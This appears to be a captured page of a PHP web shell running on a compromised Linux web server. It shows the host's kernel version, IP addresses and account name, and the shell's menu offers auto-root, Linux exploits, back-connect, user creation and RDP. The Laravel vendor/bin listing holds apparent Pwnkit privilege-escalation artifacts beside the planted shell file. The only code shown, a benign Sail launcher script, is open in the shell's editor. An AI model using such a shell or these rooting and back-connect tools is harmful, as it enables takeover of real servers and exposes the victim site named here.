Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo7.com /
vendor /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
carbon
3.25
KB
-rw-rw-r--
carbon.bat
133
B
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
patch-type-declarations
3.35
KB
-rw-rw-r--
patch-type-declarations.bat
150
B
-rw-rw-r--
php-parse
3.27
KB
-rw-rw-r--
php-parse.bat
136
B
-rw-rw-r--
phpunit
3.6
KB
-rw-rw-r--
phpunit.bat
134
B
-rw-rw-r--
pint
3.25
KB
-rw-rw-r--
pint.bat
131
B
-rw-rw-r--
psysh
3.24
KB
-rw-rw-r--
psysh.bat
132
B
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
sail
946
B
-rw-rw-r--
sail.bat
152
B
-rw-rw-r--
var-dump-server
3.32
KB
-rw-rw-r--
var-dump-server.bat
142
B
-rw-rw-r--
yaml-lint
3.29
KB
-rw-rw-r--
yaml-lint.bat
136
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sail
#!/usr/bin/env sh # Support bash to support `source` with fallback on $0 if this does not run with bash # https://stackoverflow.com/a/35006505/6512 selfArg="$BASH_SOURCE" if [ -z "$selfArg" ]; then selfArg="$0" fi self=$(realpath $selfArg 2> /dev/null) if [ -z "$self" ]; then self="$selfArg" fi dir=$(cd "${self%[/\\]*}" > /dev/null; cd ../laravel/sail/bin && pwd) if [ -d /proc/cygdrive ]; then case $(which php) in $(readlink -n /proc/cygdrive)/*) # We are in Cygwin using Windows php, so the path must be translated dir=$(cygpath -m "$dir"); ;; esac fi export COMPOSER_RUNTIME_BIN_DIR="$(cd "${self%[/\\]*}" > /dev/null; pwd)" # If bash is sourcing this file, we have to source the target as well bashSource="$BASH_SOURCE" if [ -n "$bashSource" ]; then if [ "$bashSource" != "$0" ]; then source "${dir}/sail" "$@" return fi fi exec "${dir}/sail" "$@"
Close